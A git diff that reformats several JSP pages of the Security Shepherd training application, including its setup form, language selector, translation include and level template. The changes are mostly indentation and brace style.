-                                key="generic.text.setup.enable.unsafe.warn"/>
+						<div class="row">
+							<div class="col-25">
+								<label for="mhost"><fmt:message
+										key="generic.text.setup.enable.unsafe" /></label>
+							</div>
+							<div class="col-75">
+								<input type="checkbox" id="unsafeLevels" name="unsafeLevels"
+									value=""> <span id="showHideWarning"
+									style="display: none"> <fmt:message
+										key="generic.text.setup.enable.unsafe.warn" />
 								</span>
-                        </div>
-                    </div>
+							</div>
+						</div>
 
-                    <div class="row">
-                        <input type="submit" id="submitButton"
-                               value="<fmt:message key="generic.text.submit" />">
-                    </div>
-                    <div align="center" id="submitLoading" style="display: none;">
-                        <fmt:message key="generic.text.loading"/>
-                    </div>
-                </form>
-                <div id="resultResponse"></div>
-            </div>
-        </div>
-        <!-- end content -->
-    </div>
-</div>
-<!-- end page -->
-<script>
-    jQuery.fn.center = function () {
-        this.css("position", "absolute");
-        this.css("left", (($(window).width() - this.outerWidth()) / 2)
-            + $(window).scrollLeft() + "px");
-        return this;
-    }
+						<div class="row">
+							<input type="submit" id="submitButton"
+								value="<fmt:message key="generic.text.submit" />">
+						</div>
+						<div align="center" id="submitLoading" style="display: none;">
+							<fmt:message key="generic.text.loading" />
+						</div>
+					</form>
+					<div id="resultResponse"></div>
+				</div>
+			</div>
+			<!-- end content -->
+		</div>
+	</div>
+	<!-- end page -->
+	<script>
+		jQuery.fn.center = function() {
+			this.css("position", "absolute");
+			this.css("left", (($(window).width() - this.outerWidth()) / 2)
+					+ $(window).scrollLeft() + "px");
+			return this;
+		}
 
-    $("#tools").click(function () {
-        $("#toolsTable").show("slow");
-    });
+		$("#tools").click(function() {
+			$("#toolsTable").show("slow");
+		});
 
-    $("#showAbout").click(function () {
-        $("#aboutDiv").show("slow");
-    });
+		$("#showAbout").click(function() {
+			$("#aboutDiv").show("slow");
+		});
 
-    $("#setupForm")
-        .submit(
-            function () {
-                var thedbhost = $("#dbhost").val();
-                var thedbport = $("#dbport").val();
-                var thedbuser = $("#dbuser").val();
-                var thedbpass = $("#dbpass").val();
-                var thedboverride = $("#dboverride").val();
-                var thedbauth = $("#dbauth").val();
-                var enableMongo = $("#enableMongoChallenge").val();
-                var themhost = $("#mhost").val();
-                var themport = $("#mport").val();
-                var unsafeLevels = $("#unsafeLevels").val();
-                if (thedbauth != null) {
-                    $("#submitLoading").slideDown("fast");
-                    $("#resultResponse").slideUp("fast");
-                    //The Ajax Operation
-                    $("#submitButton")
-                        .slideUp(
-                            "fast",
-                            function () {
-                                var ajaxCall = $
-                                    .ajax({
-                                        type: "POST",
-                                        url: "setup",
-                                        data: {
-                                            dbhost: thedbhost,
-                                            dbport: thedbport,
-                                            dbuser: thedbuser,
-                                            dbpass: thedbpass,
-                                            dboverride: thedboverride,
-                                            dbauth: thedbauth,
-                                            enableMongoChallenge: enableMongo,
-                                            mhost: themhost,
-                                            mport: themport,
-                                            unsafeLevels: unsafeLevels
-                                        },
-                                        async: false
-                                    });
-                                $("#submitLoading")
-                                    .slideUp(
-                                        "fast",
-                                        function () {
-                                            if (ajaxCall.status == 200) {
-                                                console
-                                                    .log("Request OK. Showing Reponse");
-                                                $(
-                                                    '#resultResponse')
-                                                    .html(
-                                                        ajaxCall.responseText);
-                                            } else {
-                                                $(
-                                                    '#resultResponse')
-                                                    .html(
-                                                        "<br/><p> <fmt:message key="generic.text.sorryError" />: "
-                                                        + ajaxCall.status
-                                                        + " "
-                                                        + ajaxCall.statusText
-                                                        + "</p><br/>");
-                                            }
-                                            $(
-                                                "#resultResponse")
-                                                .show(
-                                                    "slow");
-                                            $(
-                                                "#submitButton")
-                                                .slideDown(
-                                                    "slow");
-                                        });
-                                if (ajaxCall.responseText
-                                    .indexOf("<fmt:message key="generic.text.setup.response.success" />") != -1) {
-                                    window.location
-                                        .replace("login.jsp");
-                                }
-                            });
-                } else {
-                    console.log("No dbauth Submitted");
-                }
-            });
-</script>
-<%
-    if (Analytics.googleAnalyticsOn) {
-%><%=Analytics.googleAnalyticsScript%>
-<%
-    }
-%>
+		$("#setupForm")
+				.submit(
+						function() {
+							var thedbhost = $("#dbhost").val();
+							var thedbport = $("#dbport").val();
+							var thedbuser = $("#dbuser").val();
+							var thedbpass = $("#dbpass").val();
+							var thedboverride = $("#dboverride").val();
+							var thedbauth = $("#dbauth").val();
+							var enableMongo = $("#enableMongoChallenge").val();
+							var themhost = $("#mhost").val();
+							var themport = $("#mport").val();
+							var unsafeLevels = $("#unsafeLevels").val();
+							if (thedbauth != null) {
+								$("#submitLoading").slideDown("fast");
+								$("#resultResponse").slideUp("fast");
+								//The Ajax Operation
+								$("#submitButton")
+										.slideUp(
+												"fast",
+												function() {
+													var ajaxCall = $
+															.ajax({
+																type : "POST",
+																url : "setup",
+																data : {
+																	dbhost : thedbhost,
+																	dbport : thedbport,
+																	dbuser : thedbuser,
+																	dbpass : thedbpass,
+																	dboverride : thedboverride,
+																	dbauth : thedbauth,
+																	enableMongoChallenge : enableMongo,
+																	mhost : themhost,
+																	mport : themport,
+																	unsafeLevels : unsafeLevels
+																},
+																async : false
+															});
+													$("#submitLoading")
+															.slideUp(
+																	"fast",
+																	function() {
+																		if (ajaxCall.status == 200) {
+																			console
+																					.log("Request OK. Showing Reponse");
+																			$(
+																					'#resultResponse')
+																					.html(
+																							ajaxCall.responseText);
+																		} else {
+																			$(
+																					'#resultResponse')
+																					.html(
+																							"<br/><p> <fmt:message key="generic.text.sorryError" />: "
+																									+ ajaxCall.status
+																									+ " "
+																									+ ajaxCall.statusText
+																									+ "</p><br/>");
+																		}
+																		$(
+																				"#resultResponse")
+																				.show(
+																						"slow");
+																		$(
+																				"#submitButton")
+																				.slideDown(
+																						"slow");
+																	});
+													if (ajaxCall.responseText
+															.indexOf("<fmt:message key="generic.text.setup.response.success" />") != -1) {
+														window.location
+																.replace("login.jsp");
+													}
+												});
+							} else {
+								console.log("No dbauth Submitted");
+							}
+						});
+	</script>
+	<%
+		if (Analytics.googleAnalyticsOn) {
+	%><%=Analytics.googleAnalyticsScript%>
+	<%
+		}
+	%>
 </body>
 </html>
diff --git a/src/main/webapp/translation-select.jsp b/src/main/webapp/translation-select.jsp
index 6189f2c8e..286cfcb2e 100644
--- a/src/main/webapp/translation-select.jsp
+++ b/src/main/webapp/translation-select.jsp
@@ -1,13 +1,13 @@
-<%@page contentType="text/html" pageEncoding="UTF-8" %>
+<%@page contentType="text/html" pageEncoding="UTF-8"%>
 
 <form style="position: absolute; top: 0.5em; right: 0.5em">
-    <select id="lang" name="lang" onchange="submit()">
-        <option value="en" ${lang == 'en' ? 'selected' : ''}>English</option>
-        <option value="es" ${lang == 'es' ? 'selected' : ''}>Español</option>
-        <option value="fr" ${lang == 'fr' ? 'selected' : ''}>Français</option>
-        <option value="pt" ${lang == 'pt' ? 'selected' : ''}>Português</option>
-        <option value="ga" ${lang == 'ga' ? 'selected' : ''}>Gaeilge</option>
-        <option value="zh" ${lang == 'zh' ? 'selected' : ''}>中文</option>
-        <option value="hi" ${lang == 'hi' ? 'selected' : ''}>Hindi(Hinglish)</option>
-    </select>
+	<select id="lang" name="lang" onchange="submit()">
+		<option value="en" ${lang == 'en' ? 'selected' : ''}>English</option>
+		<option value="es" ${lang == 'es' ? 'selected' : ''}>Español</option>
+		<option value="fr" ${lang == 'fr' ? 'selected' : ''}>Français</option>
+		<option value="pt" ${lang == 'pt' ? 'selected' : ''}>Português</option>
+		<option value="ga" ${lang == 'ga' ? 'selected' : ''}>Gaeilge</option>
+		<option value="zh" ${lang == 'zh' ? 'selected' : ''}>中文</option>
+		<option value="hi" ${lang == 'hi' ? 'selected' : ''}>Hindi(Hinglish)</option>
+	</select>
 </form>
diff --git a/src/main/webapp/translation.jsp b/src/main/webapp/translation.jsp
index eeb613263..ea7528a7a 100644
--- a/src/main/webapp/translation.jsp
+++ b/src/main/webapp/translation.jsp
@@ -1,11 +1,11 @@
-<%@page import="java.util.Locale" %>
-<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core" %>
-<%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt" %>
+<%@page import="java.util.Locale"%>
+<%@ taglib prefix="c" uri="http://java.sun.com/jsp/jstl/core"%>
+<%@ taglib prefix="fmt" uri="http://java.sun.com/jsp/jstl/fmt"%>
 
 <c:set var="lang"
-       value="${not empty param.lang ? param.lang : not empty lang ? lang : pageContext.request.locale}"
-       scope="session"/>
+	value="${not empty param.lang ? param.lang : not empty lang ? lang : pageContext.request.locale}"
+	scope="session" />
 
-<fmt:requestEncoding value="UTF-8"/>
-<fmt:setLocale value="${lang}"/>
-<fmt:setBundle basename="i18n.text"/>
\ No newline at end of file
+<fmt:requestEncoding value="UTF-8" />
+<fmt:setLocale value="${lang}" />
+<fmt:setBundle basename="i18n.text" />
\ No newline at end of file
diff --git a/src/main/webapp/webLevelTemplate.jsp b/src/main/webapp/webLevelTemplate.jsp
index 536719c18..59978e304 100644
--- a/src/main/webapp/webLevelTemplate.jsp
+++ b/src/main/webapp/webLevelTemplate.jsp
@@ -1,136 +1,143 @@
 <%@ page contentType="text/html; charset=UTF-8" pageEncoding="UTF-8"
-         language="java" import="utils.*, org.owasp.encoder.Encode" errorPage="" %>
-<%@ page import="java.util.Locale, java.util.ResourceBundle" %>
+	language="java" import="utils.*, org.owasp.encoder.Encode" errorPage=""%>
+<%@ page import="java.util.Locale, java.util.ResourceBundle"%>
 <%
-    /**
-     * <br/><br/>
-     * This file is part of the Security Shepherd Project.
-     *
-     * The Security Shepherd project is free software: you can redistribute it and/or modify
-     * it under the terms of the GNU General Public License as published by
-     * the Free Software Foundation, either version 3 of the License, or
-     * (at your option) any later version.<br/>
-     *
-     * The Security Shepherd project is distributed in the hope that it will be useful,
-     * but WITHOUT ANY WARRANTY; without even the implied warranty of
-     * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
-     * GNU General Public License for more details.<br/>
-     *
-     * You should have received a copy of the GNU General Public License
-     * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>.
-     *
-     * @author Your Name
-     */
+/**
+ * <br/><br/>
+ * This file is part of the Security Shepherd Project.
+ * 
+ * The Security Shepherd project is free software: you can redistribute it and/or modify
+ * it under the terms of the GNU General Public License as published by
+ * the Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.<br/>
+ * 
+ * The Security Shepherd project is distributed in the hope that it will be useful,
+ * but WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
+ * GNU General Public License for more details.<br/>
+ * 
+ * You should have received a copy of the GNU General Public License
+ * along with the Security Shepherd project.  If not, see <http://www.gnu.org/licenses/>. 
+ *
+ * @author Your Name
+ */
 
 //MUST be in English and no Quotes In level Name
-    String levelName = "Level Name";
+String levelName = "Level Name";
 //Alphanumeric Only
-    String levelHash = "Level Hash";
+String levelHash = "Level Hash";
 //Translation Stuff
-    Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
-    ResourceBundle bundle = ResourceBundle.getBundle("thei18nFileWithTheStrings", locale);
+Locale locale = new Locale(Validate.validateLanguage(request.getSession()));
+ResourceBundle bundle = ResourceBundle.getBundle("thei18nFileWithTheStrings", locale);
 //Used more than once translations
-    String i18nLevelName = bundle.getString("title.");
+String i18nLevelName = bundle.getString("title.");
 
-    ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
-    if (request.getSession() != null) {
-        HttpSession ses = request.getSession();
-        //Getting CSRF Token from client
-        Cookie tokenCookie = null;
-        try {
-            tokenCookie = Validate.getToken(request.getCookies());
-        } catch (Exception htmlE) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + ".jsp: tokenCookie Error:" + htmlE.toString());
-        }
-        // validateSession ensures a valid session, and valid role credentials
-        // If tokenCookie == null, then the page is not going to continue loading
-        if (Validate.validateSession(ses) && tokenCookie != null) {
-            ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
+ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " Accessed");
+if (request.getSession() != null)
+{
+	HttpSession ses = request.getSession();
+	//Getting CSRF Token from client
+	Cookie tokenCookie = null;
+	try
+	{
+		tokenCookie = Validate.getToken(request.getCookies());
+	}
+	catch(Exception htmlE)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName +".jsp: tokenCookie Error:" + htmlE.toString());
+	}
+	// validateSession ensures a valid session, and valid role credentials
+	// If tokenCookie == null, then the page is not going to continue loading
+	if (Validate.validateSession(ses) && tokenCookie != null)
+	{
+		ShepherdLogManager.logEvent(request.getRemoteAddr(), request.getHeader("X-Forwarded-For"), levelName + " has been accessed by " + ses.getAttribute("userName").toString(), ses.getAttribute("userName"));
 
 %>
 <html xmlns="http://www.w3.org/1999/xhtml">
 <head>
-    <meta http-equiv="content-type" content="text/html; charset=utf-8"/>
-    <title>Security Shepherd - <%=i18nLevelName%>
-    </title>
-    <link href="../css/lessonCss/theCss.css" rel="stylesheet"
-          type="text/css" media="screen"/>
+<meta http-equiv="content-type" content="text/html; charset=utf-8" />
+<title>Security Shepherd - <%=i18nLevelName%></title>
+<link href="../css/lessonCss/theCss.css" rel="stylesheet"
+	type="text/css" media="screen" />
 </head>
 <body>
-<script type="text/javascript" src="../js/jquery.js"></script>
-<div id="contentDiv">
-    <h2 class="title"><%= i18nLevelName %>
-    </h2>
-    <p>
-        <%= bundle.getString("paragraph.info.1") %>
-        <br/> <br/> <a href="<%=levelHash%>/DownloadMe.zip">Download Me</a>
-        <% /* IF you need a form - Present it like this */ %>
-        <%
-            /*
-            <br />
-            <br />
-            <form id="leForm" action="javascript:;">
-                <table>
-                <tr><td>
-                    <div id="submitButton">
-                    <input type="submit" value="Get Info"/></div>
-                    <p style="display: none;" id="loadingSign">Loading...</p>
-                    <div style="display: none;" id="hintButton"><input type="button" value="Would you like a hint?" id="theHintButton"/></div>
-                </td></tr>
-                </table>
-            </form>
-
-            <div id="resultsDiv"></div>
-            */
-        %>
-    </p>
-</div>
-<% /*If you need to call the Server Do it like this */ %>
-<%
-    /*
-    <script>
-        $("#leForm").submit(function(){
-            var theVariableName = $("#variableName").val();
-            var theSecondVariableName = $("#secondVariableName").val();
-            $("#submitButton").hide("fast");
-            $("#loadingSign").show("slow");
-            $("#resultsDiv").hide("slow", function(){
-                var ajaxCall = $.ajax({
-                    type: "POST",
-                    url: "<ChangeThis= levelHash ChangeThis>",
-                    data: {
-                        variableName: theVariableName,
-                        secondVariableName: theSecondVariableName
-                    },
-                    async: false
-                });
-                if(ajaxCall.status == 200)
-                {
-                    $("#resultsDiv").html(ajaxCall.responseText);
-                }
-                else
-                {
-                    $("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
-                }
-                $("#resultsDiv").show("slow", function(){
-                    $("#loadingSign").hide("fast", function(){
-                        $("#submitButton").show("slow");
-                    });
-                });
-            });
-        });
-    </script>
-    */
-%>
-<% if (Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
-<% } %>
+	<script type="text/javascript" src="../js/jquery.js"></script>
+	<div id="contentDiv">
+		<h2 class="title"><%= i18nLevelName %></h2>
+		<p>
+			<%= bundle.getString("paragraph.info.1") %>
+			<br /> <br /> <a href="<%=levelHash%>/DownloadMe.zip">Download Me</a>
+			<% /* IF you need a form - Present it like this */ %>
+			<%
+				/*
+				<br />
+				<br />
+				<form id="leForm" action="javascript:;">
+					<table>
+					<tr><td>			
+						<div id="submitButton">
+						<input type="submit" value="Get Info"/></div>
+						<p style="display: none;" id="loadingSign">Loading...</p>
+						<div style="display: none;" id="hintButton"><input type="button" value="Would you like a hint?" id="theHintButton"/></div>
+					</td></tr>
+					</table>
+				</form>
+				
+				<div id="resultsDiv"></div>
+				*/
+				%>
+		</p>
+	</div>
+	<% /*If you need to call the Server Do it like this */ %>
+	<%
+		/*
+		<script>
+			$("#leForm").submit(function(){
+				var theVariableName = $("#variableName").val();
+				var theSecondVariableName = $("#secondVariableName").val();
+				$("#submitButton").hide("fast");
+				$("#loadingSign").show("slow");
+				$("#resultsDiv").hide("slow", function(){
+					var ajaxCall = $.ajax({
+						type: "POST",
+						url: "<ChangeThis= levelHash ChangeThis>",
+						data: {
+							variableName: theVariableName, 
+							secondVariableName: theSecondVariableName
+						},
+						async: false
+					});
+					if(ajaxCall.status == 200)
+					{
+						$("#resultsDiv").html(ajaxCall.responseText);
+					}
+					else
+					{
+						$("#resultsDiv").html("<p> An Error Occurred: " + ajaxCall.status + " " + ajaxCall.statusText + "</p>");
+					}
+					$("#resultsDiv").show("slow", function(){
+						$("#loadingSign").hide("fast", function(){
+							$("#submitButton").show("slow");
+						});
+					});
+				});
+			});
+		</script>
+		*/
+		%>
+	<% if(Analytics.googleAnalyticsOn) { %><%= Analytics.googleAnalyticsScript %>
+	<% } %>
 </body>
 </html>
 <%
-        } else {
-            response.sendRedirect("../loggedOutSheep.html");
-        }
-    } else {
-        response.sendRedirect("../loggedOutSheep.html");
-    }
+	}
+	else
+	{
+		response.sendRedirect("../loggedOutSheep.html");
+	}
+}
+else
+{
+	response.sendRedirect("../loggedOutSheep.html");
+}
 %>